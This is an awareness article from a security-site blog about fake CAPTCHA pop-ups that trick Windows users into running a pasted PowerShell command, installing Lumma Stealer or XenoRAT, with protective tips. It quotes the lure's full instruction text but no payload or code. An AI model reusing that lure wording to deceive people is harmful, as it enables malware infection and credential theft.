By now, many of us have become so familiar with CAPTCHA that it’s become second nature to prove we’re “not a robot” without batting an eyelid, whether it’s typing out an obscured text or ticking a box. But would you notice if the CAPTCHA requests went even further?
Apparently, many people don’t, considering the recent rise in threat actors exploiting CAPTCHA to trick Windows users into downloading malware like trojans and info stealers to their computers. A report from HP examining this trend in Q4 of 2024 blames “click tolerance,” which refers to how people have grown used to completing multiple authentication steps online.
The CAPTCHA ruse
The cyberattack begins with the victim being redirected to a site run by malicious actors and prompted to complete verification steps to prove they’re a human. Instead of the usual CAPTCHA, according to Malwarebytes, a pop-up window will appear, often saying something like this:
“To better prove you are not a robot, please:
- Press & hold the Windows Key + R.
- In the verification windows, press Ctrl + V.
- Press Enter on your keyboard to finish.
You will observe and agree:
“I’m not a robot – reCAPTCHA Verification ID: 8253”
Perform the steps above to finish verification.”
The final two lines are presented with a tick box and a “Verify” button. If the user completes the steps, they will unwittingly run a malicious Powershell command and download malware. Often, it’s the Lumma Stealer remote access trojan (RAT). Other campaigns used XenoRAT and malicious JavaScript code inside Scalable Vector Graphic (SVG) images that would deploy several different types of malware to the victim’s computer.
What the malware can do
Lumma stealer is a malware-as-a-service info stealer that targets various data, such as cryptocurrency wallets, user credentials, and two-factor authentication browser extensions. Meanwhile, XenoRAT has advanced surveillance capabilities, such as microphone and webcam capture, as well as the ability to control devices, exfiltrate data, and log keystrokes.
How to protect yourself
Vigilance is key. Mindlessly following instructions from a pop-up online is never good, and that’s doubly so when it comes from an unfamiliar website you’ve never visited before. Extra steps you can take include:
- Installing a browser extension to block malicious domains and scam sites
- Installing anti-malware software to prevent you from downloading malicious scripts
- Disabling browser JavaScript when visiting unfamiliar sites
Cora is a digital copywriter for SSLs.com. Having eight years of experience in online content creation, she is a versatile writer with an interest in a wide variety of topics, ranging from technology to marketing.